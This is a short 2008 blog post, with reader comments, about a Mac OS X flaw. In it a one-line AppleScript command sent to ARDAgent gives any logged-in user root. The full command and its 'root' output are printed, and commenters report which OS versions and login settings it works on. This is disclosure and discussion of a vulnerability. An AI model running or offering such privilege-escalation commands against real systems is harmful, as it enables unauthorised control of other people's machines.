«
»

Apple gets Pwned

$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
root

Wow. A one line script that allows any logged in user to grab root, not even a buffer overflow or third party software involved. This is movie plot hacking at its finest. I haven’t seen an attack this bad in years.

The only thing I would imagine that could be worse would be if you could execute this attack remotely.

«
»

This entry was posted on Wednesday, June 18th, 2008 at 8:39 PM and is filed under Mac. You can follow any responses to this entry through the Atom feed. You can make a comment, Digg this story, or trackback from your own site.

4 Responses to “Apple gets Pwned”

  1. Rand Says:
    June 19th, 2008 at 9:26 PM

    Doesn’t work on 10.4.9.

  2. Faria Says:
    June 20th, 2008 at 6:43 PM

    yep, doesn’t work in Tiger… but works every time in Leopard. Impressive. I hope you have reported it to Apple ?

  3. Elliotte Rusty Harold Says:
    June 22nd, 2008 at 9:49 AM

    I’ve verified it on Leopard and I’m told it works on Tiger, though I haven’t personally checked that.

    There are a couple of things that may cause it to fail. If Fast User Switching is disabled, or if you’ve logged into an account via Fast user switching, then I don’t think this works. Otherwise I think it does.

  4. Evan Says:
    June 25th, 2008 at 11:06 PM

    I have Fast User Switching enabled, but I logged into my account via Fast User Switching — it works on 10.5.3 under this scenario :(

Leave a Reply